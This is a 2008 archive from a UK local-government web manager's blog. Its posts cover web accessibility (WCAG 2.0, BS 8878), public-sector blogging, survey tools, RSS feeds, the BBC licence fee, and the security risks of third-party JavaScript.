Wednesday 31 December 2008

2008 online - some retrospectives

As the year draws to a close, here's a few retrospectives looking at the highlights of 2008 on the web, as well as looking forward to 2009. Let me know if you've spotted any others worth including here.

Looking back...

The BBC's list of technology we have loved in 2008
From dongles to netbooks and services to applications, the BBC News technology team talk through what they have loved in the world of technology during 2008.
Google Zeitgeist 2008
Studying the aggregation of the billions of search queries that people type into the Google search box gives us a glimpse into the zeitgeist — the spirit of the times. We've compiled some of the highlights from Google searches around the globe and hope you enjoy looking back as much as we do.
The Register's jaw-droppers of 2008
Here is The Register's list of the worst, most cringe-worthy and jaw-dropping moments from the last 12 months that people would probably prefer to forget about. Nine wags of the finger plus - because it wasn't all bad this year - one tip of the hat, for balance.
Web Marketing Association's WebAwards 2008
Now in its 12th year, the WebAwards is the premier annual website award competition that names the best Web sites in 96 industries while setting the standard of excellence for all website development.
Time.com's 50 Best Websites 2008
Some are as useful as a GPS device, others aren't that useful but give you something to do when you had nothing planned for the day. Put them all together and they become TIME.com's 2008 picks for the best the Web has to offer.
Wired.com's 10 Best Galleries of 2008
A year of fast and furious pixel-pushing by the Wired.com photo department has finally come to a close. Now, as we slow down long enough to risk a look back, we've compiled a list of our favorites from the hundreds of galleries we ran in 2008.

and looking forward...

ReadWriteWeb's predictions for 2009
It's time for our annual predictions post, in which the ReadWriteWeb authors look forward to what 2009 might bring in the world of Web technology and new media.
Website Magazine's prediction for 2009
Website Magazine’s predictions for 2009 reveal that in spite of our current economy, the Web as a whole will continue to see strong growth and investment over the next year - a prediction that many industry analysts don't necessarily agree with.
Happy new year to you all!

Tuesday 30 December 2008

Slippery deadlines not good for business

I've had cause to think about this subject recently when we had a bit of a palaver over the public deadline for our online school enrolment forms. Released in mid-November, the deadline was set at December 24th. A bit tight, I thought, but it's not my position to question such things. Christmas came and went, and I asked if it was appropriate to now remove the forms, given that the deadline had passed. Oh no, I was told, as by law we must accept applications until 15th March. I was then asked to amend the deadline date accordingly. The December deadline was a fake.

Although I can understand that it is useful to receive submissions as early as possible, to allow staff to manage their workloads, it seems a bit unreasonable to present a false deadline which is then discretely extended. Many people will have put themselves to great inconvenience to complete this form in time, especially given the time of year, and to find that the deadline has been extended by almost three months will no doubt cause annoyance. There is also the risk that citizens will stop taking deadlines seriously, and may miss the window of opportunity in the future, where stated deadlines are genuine.

Far better, perhaps, to give the genuine deadline, but state that early submission is recommended. In some cases (for example, applying for grants from a limited fund) you could even suggest that early submissions will receive preference - that should get people moving!

Consultations

Similar issues have dogged some recent consultations that we've held, with deadlines being pushed back and back to try to squeeze out more responses. The problem here is that those who aimed for the original deadline may not have given themselves sufficient time to compose a full and accurate response. Those who replied early on are likely to be those who feel strongest about the subject of the consultation, and therefore the kind of people you want to listen to carefully and not annoy.

Of course, there are some instances where extending a deadline is sensible. In a consultation where new information has come to light, for example, or where there has been a technical problem preventing people from completing the process. In such cases, the reason for the extension should always be made clear. Otherwise, the organisation risks looking unorganised and unprofessional.

Project deadlines

The same applies to project deadlines. I recently finished a job which had to be completed by a certain date. No problem there - I'm used to tight deadlines. But when the delivery day arrived, the client came back with a few tweaks and some new requests, and it turned out the original deadline wasn't as crucial as first made out. These fake deadlines don't do the developer any favours - many things may get rushed or dropped entirely as a result. Also, it's usually a lot harder to change a final product, rather than factor in any modifications as part of the build process. It's therefore far more productive to set milestones, where you deliver certain things by certain timescales. This allows for a far smoother progression from planning to the final product.

Saturday 20 December 2008

Screen Reader survey

WebAIM are conducting a survey of the preferences of Screen Reader users.
"If you are a full-time, part-time, or even occasional screen reader user, please take a few minutes to complete the survey and provide us with a few details on your screen reader usage and preferences.... The results of the survey will be made public in a few months. We believe the results will be very useful to those who are developing accessible web content."
The results could be very enlightening, and I'd hope that anyone in a position to reply would do so to help inform best practices in designing websites sympathetic to the needs of these users.

I'll be sure to report the release of the results in the new year, so watch this space or head over to WebAIM to get it from the horse's mouth!

Thursday 18 December 2008

Survey Monkey useful features

I've been using Survey Monkey within my organisation for two months now (see my original post about its accessibility, which I'm still looking into). I must say I've been very impressed by the customer service - I've had a few questions which the (generally excellent) help section has been unable to help me with (mainly because contact with a person was necessary), and they've always been quick to respond.

I thought I'd mention a couple of things I've done since taking over the account. The lessons learned apply to any similar function, not just Survey Monkey.

SSL enabled

Firstly, I was surprised to see that the account did not have SSL enabled. This costs just $100 extra a year which, for a organisation such as mine, is peanuts. Compare that with the disasters that could await if not using a secure protocol and it's a no-brainer. Sadly this only really came to my attention when I heard about a survey we'd run to gather parent's opinions on school buildings. A local parent council blog had flagged up the potential security risk, and quite rightly so. We were asking for a few personal details, although to be fair these were not mandatory. Even so, those unaware of the difference between http and https may not have appreciated the risks (however small) and that's not really on. Needless to say we've now upgraded, so people's response are collected securely at their end and the results are downloaded securely at this end.

Friendly URLs

Secondly, a nice "courtesy feature"* is the ability to request friendly URLs. So instead of the usual string of alpha-numeric characters you can get something that actually makes sense (e.g. www.surveymonkey.com/mysurvey). This is really useful, especially if there's a chance that people may need to type in the address, or if you want to refer to it in print. To underline the great customer service, I requested one to be set up and it took just a couple of hours.

Something to be aware of, if also using SSL, is that your users will need to include the https:// at the start of the URL. If they just type in from the www... they'll get directed to the insecure version. Survey Monkey does not offer the ability to always redirect to the secure version, which they say is for the benefit of any systems that can not access the secure pages.

*Presumably a "courtesy feature" is something they'll probably do, but aren't obligated to. Hopefully, then, they'll continue to offer this (and for free).

Loop to start

You've got various options for where to direct the user on completion of the survey (i.e. to a thank you page, another website, or even close the window). Another option, though, is to loop the user back to the start of the survey. This function has proved useful recently when we used Survey Monkey as the basis for an audit. Each auditor would typically be looking at 5 or more things, each requiring a unique response, so once one audit was complete they'd be going straight back into the survey to do another. The 'loop to start' function was, obviously, the perfect solution for this.

Invitations by e-mail

A tremendously useful feature is the ability to set up Survey Monkey to e-mail a list of recipients with an invitation to complete your survey. Each recipient gets a unique URL, enabling the system to track who has and hasn't responded. This then means that you can easily send reminders targeted only at those who are yet to respond.

I thought it worth mentioning this function in the privacy statement that I am developing to accompany any surveys, and accordingly included this on the front page of the survey:
If you arrived at this survey via an e-mail invitation, it will be possible for us to link your answers with your e-mail address. Any information you provide will be kept secure and only used for evaluating the results of the survey.

Tuesday 16 December 2008

Government 2.0 - current initiatives wiki

I've just been looking at a wiki of current initiatives for Goverment 2.0 - that is, government's use of social media.

At the moment it has a heavy leaning towards US and Canadian initiatives, although there is a smattering of international efforts too. There are some great examples, including:
  • Wikis to improve internal collaboration
  • Geo-tagged images on Flickr
  • Podcasts to reach new audiences
  • Lots of use of Blogs, Facebook, Twitter, Youtube, SecondLife etc etc...
Hopefully this wiki will continue to grow, and the intention is for it to eventually offer best practices. Kudos to Mike Kujawski for creating the wiki, as well as to Jose Alonso (W3C eGovernment Interest Group) for the heads-up.

Monday 15 December 2008

Staying alert - who's talking about your site?

I've recently started using Google Alerts:
Google Alerts are email updates of the latest relevant Google results (web, news, etc.) based on your choice of query or topic. Some handy uses of Google Alerts include:
  • monitoring a developing news story
  • keeping current on a competitor or industry
  • getting the latest on a celebrity or event
  • keeping tabs on your favorite sports teams
I set up a number of alerts based on various topics of interest and the emails started coming thick and fast (I opted for 'as-it-happens' alert frequency in most cases, but you can also specify daily or weekly digests).

What has been most useful is hearing about the various blogs which are talking about the organisation and its website, as well as seeing which sites are linking to us. A large proportion of the alerts come from news sources too, so I can also keep tabs on the media. Not only is this an important Comms issue, but it is also a crucial step in becoming proactive with Web 2.0 technologies in general

Company Buzz is another interesting application, this time for users of Linkedin. Powered by Twitter, this application pulls in links to sites that are talking about your company (for better or for worse!). It also gives you a list of Buzz Words.

With these sorts of tools, as well as through monitoring prominent local and national blogs, I'm hoping to build up a robust 'early-warning system' to help us react to the conversations that are taking place. Once this is well established, I'll be looking to see how we can work it into our strategies for more effectively engaging with web technologies across the board.

After all, if we wish to engage with the conversations taking place, we need to know where they are and what people are saying.

Thursday 11 December 2008

WCAG 2.0 gets the final thumbs up

Some exciting news...
Today W3C announced a new standard that will help Web designers and developers create sites that better meet the needs of users with disabilities and older users. Drawing on extensive experience and community feedback, the Web Content Accessibility Guidelines (WCAG) 2.0 improve upon W3C's groundbreaking initial standard for accessible Web content, apply to more advanced technologies, and are more precisely testable.
It's taken nearly 8 years, but we finally have a follow-up to the groundbreaking but desperately outdated first version of the international guidelines for creating accessible websites.

I've previously been in contact with the Central Office of Information to find out how quickly they'll be recommending that public sector organisations start adopting the new guidelines. Now that WCAG 2.0 is finalised, we'll hopefully see the Delivering Inclusive Websites document updated by mid-2009, but there's nothing stopping organisations preempting this and indeed I'd hope most will already be doing just that.

We can now look forward to designers across the globe rolling up their sleeves and getting stuck into the new standards, and I'm sure the collaboration that will come from this will make it a smooth transition. A starter for ten can be found in the WCAG 2.0 resources over at the Web Standards Project.

Good luck!

Other excited people

Friday 5 December 2008

Local government blogs

When I hear people in my organisation talk about starting an official blog, I am split in two. Half of me is excited by the prospect, whilst the other half cringes at the risks.

Headstar's E-Government Bulletin has an interesting report on the recent E-Democracy 2008 conference, addressing the issue of blogging and digital dialogues. This got me thinking about the subject (you'll see my initial thoughts at the end of that very article), and I've since been looking further into the world of public sector (and more specifically, local government) blogs.

Some examples

Technorati reports that it is tracking the existence of 112 million blogs. Surprisingly, then, it was a little difficult to find really good examples of well-executed local government blogs. Here are some examples, though, listing the good and the bad points of each:

Kent County Council Leader's Blog

Plus points:

  • Last post just 9 days old at the time of writing, with 3 or 4 posts a months on average
  • The posts seem to relate well to current events
  • The post titles are brief but descriptive
  • The posts offer relevant hyperlinks
  • Commenting not available, but an e-mail link offered
  • Some honest and personal views

Minus points

  • A very obvious political agenda
  • The only image is one of the blogger himself
  • No RSS feed available

London Borough of Lambeth Leader's Blog

Plus points

  • Well established blog - archive going back to October 2006
  • Good range of topic covered

Minus points

  • Erratic frequency - some months have 5+ posts, other months have none
  • The more recent posts appear at the bottom - big mistake!
  • Lack of images makes the pages very samey and uninspiring
  • No RSS feed available

Wiltshire Extranet Blog

Plus points

  • One post each and every week
  • All the trappings of a proper blog - archives, calendar, feeds, feedback

Minus points

  • Bizarrely, each post is a report of what the blogger will be doing, with no obvious follow-ups
  • An internal blog, meant for internal readers, available externally
  • No information about the blog or blogger (presumably due to its internal nature)

Durham County Council Leader's blog

Plus points

  • Blog is combined with a diary to view upcoming appointments
  • Option to add comments, and the blogger has even responded to one
  • Fairly regular posts (although only been running less than 2 months)

Minus point

  • The blog launched in October, yet the 'archive' looks like it goes back to January. You can't click on any of the months prior to October, adding to the confusion.
  • Again, lack of images makes for dull pages.
  • Not only a lack of corporate branding, but also a horrendous pink theme (OK, that one is subjective)

Pseudo-blogs

One issue which arose during my search related to the design and functionality of the blogs I encountered. Many blogs seemed to have been integrated into the main corporate website, and in fact in many cases were not technically blogs in the typical sense, but rather normal static web pages presenting chronological articles. Whilst there is nothing inherently wrong with this, it does rather stretch the blog metaphor. A typical blog has features such as categories and labels for filtering articles; the ability to comment on posts; RSS feeds or subscriptions to easily access new posts; automatically generated archives; and all manner of other widgets including polls, related links and tagclouds. These are important elements which define a blog as a Web 2.0 technology.

Lessons learned

The Durham blog is a great example of understanding the blog metaphor and adapting it to the interests of the users. By incorporating a diary, and then blogging about the events afterwards, you have a great premise for generating interest and engagement.

Lack of images was a big problem across the board, and is in fact an issue common with many blogs worldwide. A local gov organisation should have access to a wealth of stock photos which could be thrown in, where relevant, to liven up the pages. A crucial element of engaging the public is to make your channels of communication interesting, and the use of images seems like an essential ingredient in this.

The regularity of posts seemed to vary wildly, but a key point is the importance of consistency. One post per week is fine if that offers a summary of the week's events. Any less than that and the blog risks looking sparse and unresponsive to events. A greater frequency might be appropriate but it has to be sustainable. Probably far better to stick to the weekly format unless urgent issues arise.

Although many of the features of the traditional blog are perhaps overkill, some key functions should remain. Allowing comments makes perfect sense - after all, the point of the blog is to create a dialogue. Archiving is obviously a must - that's one of the things that makes it a blog. Promotion is a key issue, as the blog must be easy to find. RSS feeds will then make it easy for people to follow.

Conclusion

Blogs provide an excellent channel of communication with your citizens, and can very easily fit in with your other comms strategies. They are incredibly easy to set up, but far from easy to maintain to a high quality. They'll demand lots of time, thought, creativity and buy-in. Because of this, the failure rate is likely to be high, but the rewards are there for the successful few.

Tuesday 2 December 2008

British Standard for Web Accessibility - draft

The British Standards Institution (BSI) have released the first draft of the new British Standard for Web Accessibility - BS 8878 - for public consultation until 1st Feb 2009.
BS 8878 will suggest a practical process for ensuring that the private and public sectors successfully produce digital design that is inclusive of as many of the user population as possible. While disabled people are intended to be the key beneficiaries of the new approach, people whose first language is not English and everyone who reads web content over a mobile device stand to benefit from an approach that encourages the development of ‘accessible user experiences’.

Building upon the Publicly Available Specification "Guide to Good Practice in Commissioning Accessible Websites" (PAS78), the new British Standard will address the business case for accessibility, explaining the relevance of the Disability Discrimination Act and looking at how organisations should attain accessibility by allocating appropriate resources and choosing technologies and developers wisely.

It also talks about the user's enjoyment of a website - taking the idea of accessibility to a new level. Julie Howell, chair of the committee which has developed the standard, said:
"Access, use and enjoy are the three terms we use," [...] "Access is about the ability to reach the content; usability is about the ability to complete a task; and enjoyment is about having an enjoyable user experience and wanting to go back to that site. In the past we thought very functionally about what disabled users wanted."

Out-law.com states that the final version is expected by Summer 2009. Once I've digested the 46-page document I'll post my thoughts here (as well as submitting them to BSI, who emphasise that all comments will contribute to the development of BS 8878, helping to shape the standard).

Monday 1 December 2008

Wordpress and accessibility

I'll shortly be publishing an article on blogs in the public sector (edit: now available), but for now here's a link to an interesting article on Wordpress and accessibility. As author Mike Cherim points out, one of the sites named in the WCAG 2.0 implementation (and indeed reaching triple-A standard) was based on Wordpress, suggesting that the platform can produce very accessible results. There are a couple of issues to be aware of, though, so if you're developing sites with Wordpress you'd better read this.

Monday 24 November 2008

Google Analytics - the risks of 3rd party script

The Register has recently reported on the potential security vulnerability of using Google Analytics, and as we use this for various sites I thought it worth exploring a little further, especially as there are wider implications around linking to any third party javascript code.

The essence of the Register's article, Google Analytics - Yes, it is a security risk, is that any third party javascript you include on your pages could open you up to vulnerabilities. You are essentially at the mercy of the owners of that code, trusting them not to do anything malicious. And there are plenty of things they could do, including stealing session cookies and form data, or even executing a 'cross site script proxy' attack, which could surrender control of a user's login session.

So how big is the risk? There are a couple of factors to consider:

Firstly, how well can the script owner be trusted? A company such as Google can probably be trusted quite a bit, although we're not just talking about the integrity of the company's ethics. We also need to consider how seriously they take security themselves - how stringent are their own practices? Again, we can be fairly sure that Google is pretty hot on best security practices, so the risk is relatively low. The same might not be true of other third party sites.

Secondly, how big a target is your site? The case referred to in the Register's story was Barrack Obama's website. That site is obviously going to be a huge target for potential hackers, with security an immensely important subject. Sites with a lower profile can reasonably be assumed to be less of a target, although the risks can still not be discounted entirely.

In a recent forum post discussing this issue, the following advice was given:
if you must use external JScript, make sure it is a trusted source, and by trusted, I don't just mean the company and their reputation, but also their own security practises, and do not under any circumstances link 3rd party JScript to a "secured" or sensitive area of a site
This seems to be pretty sensible, and is something we will need to consider from now on, not just in relation to Google Analytics, but when looking at linking to any third party script. Better safe than sorry...

Friday 21 November 2008

Keeping up with your own news

Our organisation has been in the news a fair bit recently. Well, actually, being a local authority we're always in the local news and the coverage is rarely positive (and often inaccurate too). But what I've been increasingly concerned about recently is the fact that the local media keep getting there first - reporting on stories hours, sometimes days, before our own website publishes the information.

The case in point was demonstrated this week when my organisation made some important (and controversial) decisions on school closures. I'm assuming the press were notified through the usual channels, and the news made it onto their websites within hours. We, however, didn't post an update on our website until the following afternoon.

The major problem with this, apart from it looking generally poor, is that it forces citizens to look elsewhere for information that we should be providing them with. This also means that the information they eventually find will probably have been edited, and is usually accompanied by a long string of unmoderated user comments positing all sorts of theories and opinions, many of which are stultifyingly ill-informed (thanks to Chris Morris for that excellent phrase). And of course, most people will probably look to the media first anyway, but perhaps then come to our site to check the facts and to get background information. If we're not providing content to coincide with news stories appearing elsewhere, and making it prominent from the homepage, we're really failing our users.

It's not that we have a lack of news either. I recently encountered a problem where important press releases were too quickly getting bumped off the home page (which only displays the 3 most recent releases, with a link through to the rest). Our school closures story, for example, got bumped within hours by two stories about awards ceremonies and another about tips for Christmas shopping. Whilst non-critical releases are great (SOCITM's 2008 Better Connected report commended the 76% of local authority sites which featured 'good current news beyond a report of a council meeting or decision'), if the softer stories are drowning out the more important ones we are again failing our users.

This is all compounded by the fact that our site does not support RSS feeds or news alerts, so we're not actively 'pushing' these stories in the first place (SOCITM found that only 33% of local authority sites do either of these things). Our news stories are given good prominence on the homepage, but unless you actually visit our site you probably won't find our press releases.

Another problem (which impacts the speed of all developments on our site) is that content often has to go via various levels of approval before it can be published. By speeding up this approval process, or by further devolving editorial authority, we could drastically improve our ability to react to news and events more quickly and effectively. Only then can we consider ourselves to be, as the Better Connected report puts it, newsworthy.

Key points:
  • Get press releases online as quickly or quicker than the media
  • Make them prominent on the homepage, for a reasonable period of time
  • Explore other methods of distributing news - RSS, alerts, e-mail digests, SMS, news tickers etc

Wednesday 19 November 2008

Live web broadcasts and the BBC licence fee

The hot debate surrounding the BBC licence fee is about the get even more complicated with the BBC's announcement that yet more channels are set to be broadcast live online.

An item on the BBC website today reported:
BBC shows including EastEnders, Heroes and Never Mind The Buzzcocks will be available to watch live online from next week, the BBC has announced.

BBC One and BBC Two will be streamed live, - just as BBC Three, BBC Four, CBBC, CBeebies and BBC News are already broadcast on their channel websites.

Director of BBC vision Jana Bennett said this "completes our commitment" to make channels available online.

The live simulcast for both channels will be available from 27 November.

If viewers miss any programmes they will be available for up to a week on the BBC iPlayer.

"From 27 November licence fee payers will be able to watch BBC programmes live wherever they are in the UK on their computers, mobile phones and other portable devices," Ms Bennett said.

According to media watchdog Ofcom, the number of people watching TV on the internet has doubled in the last 12 months.

In 2006, Channel 4 became the first major UK TV channel to be simulcast on the internet.

As The Register points out:
Note "licence fee payers" in that quote. While catching up with shows on iPlayer does not require a TV licence, watching any live broadcast - including over the internet - does.

Big headaches lurk for enforcement authorities if live online viewing enters the mainstream: will cafes that offer Wi-Fi be required to buy a business TV licence in case their customers watch a bit of BBC One, for example?
Might this therefore also affect public libraries, who provide free internet access? And how far will the TV licence enforcers go? We have already seen mobile phone companies passing on details of customers who have purchased 3G or wireless-enabled handsets, so it's not a huge leap to imagine ISPs doing the same (if they're not already doing so).

Then comes the ambiguity of what constitutes a 'live' broadcast. A lot of 'live' streamed content is actually on a delay - a fact proven when you lose the stream and the player reconnects, taking you back to the exact second from whench you left off. TV Licencing has previously stated that even delayed 'hour plus one' type services would count as live, so we can see how ambiguous this could get.

Finally, how obvious will the difference be between 'live' content (requiring a licence) and non-live content (currently everything on iPlayer - not requiring a licence)? If the difference is subtle, it could be making it very easy for people to break the law without even realising it.

Monday 17 November 2008

WCAG 2 - claiming conformance

Anyone wanting to claim conformance to the nascent WCAG 2.0 will have to provide a specific conformance claim on their site, according to the documentation found at www.w3.org/TR/WCAG20:
Required components of a conformance claim

Conformance claims are not required. Authors can conform to WCAG 2.0 without making a claim. However, if a conformance claim is made, then the conformance claim must include the following information:
  1. Date of the claim
  2. Guidelines title, version and URI "Web Content Accessibility Guidelines 2.0 at {URI of final document}"
  3. Conformance level satisfied: (Level A, AA or AAA)
  4. A concise description of the Web pages such as a list of URIs for which the claim is made, including whether subdomains are included in the claim.
    • Note 1: The Web pages may be described by list or by an expression which describes all of the URIs included in the claim.
    • Note 2: Web-based products that do not have a URI prior to installation on the customer's Web site may have a statement that the product would conform when installed.
  5. A list of the Web content technologies relied upon.
    • Note: If a conformance logo is used, it would constitute a claim and must be accompanied by the required components of a conformance claim listed above.
Note - the concept of a technology baseline has been dropped.

The Understanding Conformance page gives some examples of wording. In the spirit of this, I decided to produce such a claim for my own Pretty Simple web site, which was used in the implementation report as part of the WCAG 2.0 Candidate Recommendation stage and has, since getting the thumbs up from the WCAG 2.0 Working Group, been claiming conformance.
On September 25th 2008, all Web pages found at www.prettysimple.co.uk conform to the Web Content Accessibility Guidelines 2.0 at www.w3.org/TR/WCAG20. Level Double-A conformance.

The web content technology relied upon is XHTML 1.0 (Strict).

The technologies used but not relied upon are: JavaScript, CSS 2.0, Flash.
I wasn't sure about where to put CSS, but felt that, as it is utilised purely for presentation and not content, it shouldn't be considered as a 'relied-upon' technology. The Flash banners are only for presentation, and have images with alt attributes behind them, so are certainly not relied upon. Equally, the Javascript used to bring in the RSS feeds on the Links page are accompanied by noscript links, so are not essential for any user.

I could also go into detail about the Level AAA Success Criteria that I meet, and may do this at some point in the future, along with details of the various user agents with which I have tested the site.

One question that has arisen is when might I be expected to update the statement? Presumably the next time I test the entire site, although given that I am making no significant changes to the pages - and only adding content occasionally, I might be forgiven for updating the date every time I update the website.

Thursday 13 November 2008

World Usability Day

Today was World Usability Day. As the website puts it:
It's about "Making Life Easy" and user friendly. Technology today is too hard to use. A cell phone should be as easy to access as a doorknob. In order to humanize a world that uses technology as an infrastructure for education, healthcare, transportation, government, communication, entertainment, work and other areas, we must develop these technologies in a way that serves people first…

World Usability Day was founded in 2005 as an initiative of the Usability Professionals' Association to ensure that services and products important to human life are easier to access and simpler to use.
A nearby event was put on by local user experience consultancy User Vision, and I've just got back from a very interesting few hours there.

A really interesting presentation by Monty Lilburn introduced us to Loadstone GPS - open source software that utilises GPS on mobile phones, resulting in easy-to-follow directions of significant use to blind and visually impaired people (through the use of mobile screen readers such as Talks or Mobile Speak). We were also shown a great little video that they had made, showing Lilburn navigating his way through Edinburgh using the software on his phone. It can (for now) be seen at www.tinyurl.com/6cukzt.

Elsewhere we saw a demonstration of eye-tracking software, which User Vision's Jamie advocated as a very powerful tool able to give you some very meaningful results; Donna was letting people get their hands on her iPhone to see how easy to use it is (or isn't); Ross was giving people a driving test challenge with the latest in iTV software; and I had an interesting chat with their accessibility consultant Mark about everything from WCAG 2.0 to the lack of a decent legal precedent in the UK which would help underline the importance of accessibility standards.

Thanks to Chris, Laura and everyone else at User Vision for an interesting afternoon.

Update - User Vision now have a press release about the day on their website, along with some useful links and a handful on photos (including one of the back of my head!).

Wednesday 12 November 2008

WCAG 2.0 and Delivering Inclusive Websites

In June 2008 Central Office of Information (COI) produced the Delivering Inclusive Websites guidance:
These guidelines are for public sector website owners and digital media project managers wishing to deliver inclusive, accessible websites. This document sets out the minimum standard of accessibility for public sector web content and web authoring tools. It recommends a user-centred approach to accessibility, taking account of user needs in the planning and procurement phases of web design projects.
These guidelines currently make reference to WCAG 1.0, so I wanted to know what would happen once WCAG 2.0 is approved. There is a paragraph which refers to this, but it is a little vague:
At the time of writing, version 1.0 of the Web Content Accessibility Guidelines is the current standard for web accessibility. At such time that version 2.0 becomes a W3C Recommendation, this policy will be reviewed within six months. Consideration will be given to the adoption of version 2.0 as the minimum standard for public sector websites.
Our organisation is currently looking at options for a new web content management system. As such a procurement would be a long-term commitment, I'm keen to know that the goalposts are not going to move halfway through implementing a solution. Whilst it's true that sites built to conform to WCAG 1.0 should meet WCAG 2.0 without too many problems, I feel it is crucial that the minimum standards are recorded in black and white in any requirements documentation.

I have therefore submitted the following enquiry to the COI:
With WCAG 2.0 currently at Proposed Recommendation stage, and due to be approved by Christmas, what plans are there to modify the information provided as part of the "Delivering inclusive websites" guidelines? What are the timescales involved i.e. how soon should the public sector be building websites according to WCAG 2.0 instead of WCAG 1.0?
and will post the reply here when received.

Update 16th Nov

Reply from COI:
We plan to review adoption of WCAG 2.0 with the public sector community. It is unclear at this stage whether doing so is in our best interests. For example, the new AA requirement for audio description and subtitles for every video would mean that we Level-A would be the only realistic option - and then the risk is that no-one implements the other Level-AA requirements.

We would also like to see what the European Commission thinks about the new standard. Anything we do would have to be in line with their thinking.

I don't think there's anything stopping people building to WCAG 2.0. Am I right in thinking that any website that's AA according to version 2.0 is automatically v1.0 compliant?
An extract from my response is as follows:
Unfortunately I don't think it is the case that WCAG 2.0 compliant sites will meet WCAG 1.0, at the equivalent conformance level, by default. There are many WCAG 1.0 checkpoints with the 'until user agents' caveat that WCAG 2.0 have now omitted, due to the conditions being met. Plus there are obvious changes such as no longer requiring Accesskeys or metadata to add semantic information to pages, or not being required to avoid deprecated features. If you therefore designed according to WCAG 2.0, I would imagine that you might fail against WCAG 1.0 on these sorts of points.

Regarding your point about unrealistic levels of compliance - I know it has been suggested elsewhere that a phased approach might be most appropriate, to account for the cost, time and expertise required to, for example, produce compliant time-based media. There may also be potential to describe the transitional approach in the conformance claim statement (which is required for any site claiming WCAG 2.0 conformance).
Hopefully we'll see some new guidance soon.

Friday 7 November 2008

Getting feeds from your own site

I recently wanted to pull in the news items from our main corporate site onto a partner site, on an existing 'news' page which already pulls in RSS Feeds from other major content providers such as the BBC, Learning Teaching Scotland and the Scottish Government. The trouble is, our corporate site does not generate such feeds, so until now I've had to manually input each new press release.

However, I'd heard that it was possible to grab content from pages even where those pages are not set up to offer RSS feeds.

A bit of searching brought me to feedity.com. This site allows you to easily set up an RSS feed based on the content of your site, and on inputting the target URL it quickly came up with a list of press releases, exactly as intended. You can also fiddle with the results if they're not as expected.

Once you've got your RSS feed, the next task is to pull it into your page. I've used Javascript to do this, using a handy script generator found at itde.vccs.edu/rss2js.

The end result can be seen at egfl.net/news. You'll see I've got feeds coming in from the sites mentioned above, as well as the newly generated feed from our own council site. There is of course also a noscript alternative linking to the pages with the news items.

Hey presto - no more updating manually!

Edit - there are other similar services to the ones I've mentioned here. For generating RSS feeds, also see Feed43, Dapper or FeedYes. For inserting the feeds into your page, also see RSSinclude or Dynaweb RSS Pal.

PS - don't forget that linking to third party Javascript carries a certain degree of risk. See my post about security and Google Analtyics for more info.

Thursday 6 November 2008

Public feedback - not a monologue

At the recent Scotweb2 Unconference, James Munro presented Patient Opinion, a website allowing users of the NHS to post feedback on their experiences - very similar to rateMDs.com, which operates in the US. It could be described as 'Trip Advisor for the NHS', in that you can check out a hospital or practice before visiting.

Munro stated that this process was about change, not choice. The aim is to create a dialogue between the service users and service providers. Actually, users were already talking about their experiences - on blogs, flickr, youtube etc - and Patient Opinion aims to provide a single platform to collate these comments and, crucially, to allow service providers to see and respond to the feedback.

The business model sees NHS services being asked to subscribe to get access to specific information, reports and the ability to respond to individual comments online. This then provides them with a platform to report the progress they have made in responding to a complaint, and further drives the idea of change.

The great advantage for the public is that they have a platform to report (often embarrassing) issues anonymously, whilst knowing that real change is also possible as a result. Because the site is independent, Munro claims that people are less inclined to leave the sort of rants that the NHS might expect to be inundated with should the site be owned by them. NHS Choices, the NHS's own site, rejects about 24% of the feedback it receives. Patient Opinion rejects only 5% - not because the standards are different, says Munro, but because people can see the real-life benefit of an independent site and are more inclined to leave legitimate, constructive feedback. And whilst positive feedback is great, the complaints provide the most value.

So what does this mean for other areas of the public sector? One problem is that we can not 'force' third-party independent solutions to come into being - they have to develop organically. Of course, they are already happening across the Web 2.0 platforms mentioned earlier. The trick is to tap into these - not trying to moderate or silence the discussions going on, but to contribute to the stream and show people that we are listening and that change is happening.

There is a major cultural shift required to get backing for this. Once out there, comments can not be taken back (you might be able to delete the original comment, but who knows where else it has gone). Anything you say must be honest, accountable and representative of the organisation. This may mean it has to go through levels of approval, which can ruin the pace and spontaneity of the dialogue (e.g. whilst you're trying you approve a response to one comment, five more have already cropped up). And there are dangers for those not playing by the rules - think of the recent story of the 13 Virgin Atlantic employees sacked for comments they made on Facebook which, their employers felt, brought the company into disrepute. Nevertheless, it is a whole new channel of communication which we can not afford to ignore.

Tuesday 4 November 2008

WCAG 2.0 Proposed Recommendation

The WCAG 2.0 Proposed Recommendation has now been published by W3C. It contains revisions made as part of the Candidate Recommendation stage. I provided an implementation experience report as part of this and I'm pleased to say that I've been named as a contributor, so hopefully my experiences proved useful to the process.

Monday 3 November 2008

Scotweb2 Unconference summary

I'll soon be writing more specifically about some of the topics discussed at last Friday's Scotweb2 Unconference, but wanted to start with a brief summary of the day and some key messages I took from it.

All in all, the day was very uplifting and provided some real food for thought. It succeeded wonderfully in bringing together a small but committed number of Web 2.0 enthusiasts, mostly from the public sector but including a few from the commercial world. Although this meant that much of the discussions were in some way 'preaching to the converted', there was still plenty of new ideas to hear about and various calls to action.

Simon Dickson's talk exemplified this well. His passion and enthusiasm for Wordpress came over in barrel loads, and certainly gave people something to think about when comparing the minimal costs of implementing the open-source blogging CMS compared with some multi-million projects he has seen in central government. It was also a more general rallying call for us to abandon concepts of quality being defined by cost, given that most of the traditional barriers to accessing these technologies are now being increasingly broken down.

James Munro, from Patient Opinion, also delivered an interesting presentation on the relationship between his independent service and the NHS, with plenty of engaging discussion about public perception, trust and the machinations of organisational change through feedback.

Derek Hemphill presented BT Tradespace, which most of the audience confessed to never having heard of. I've now set up my free account so will report back about that soon.

Stephen Dale also gave a brief introduction to the Communities of Practice platform for local gov and public sector professionals to develop and share knowledge. Non public sector members are welcome to join in where appropriate, although overt selling is not tolerated. I myself am a member of three forums and am so far enjoying the experience.

As I say, I'll be writing more about specifics once I've had a change to collect my thoughts and notes. Thanks again to Alex Stobart for organising what turned out to be a positive and exciting day of discussion.

Monday 27 October 2008

Getting to grips with Web 2.0

This Friday I'm off to the Scottish Web 2.0 Unconference in Edinburgh - "an informal, bar camp style event allowing participants to listen, network and share experiences with those who have designed and are managing Web 2 services".

To prepare for this I thought I'd have a quick recap of what Web 2.0 means to me.

Wikipedia describes Web 2.0 thus:
Web 2.0 is a term describing changing trends in the use of World Wide Web technology and web design that aims to enhance creativity, secure information sharing, collaboration and functionality of the web.
What qualifies as Web 2.0 can sometimes be in debate, and Tim Berners-Lee himself has questioned the value of the term, but for me the above keywords 'sharing, collaboration and functionality' strike at the heart of the matter. We're talking about a concept in which previously passive users become contributors, where content can be pulled apart and seamlessly put back together again, and where new ideas and innovations can more easily be built upon existing platforms.

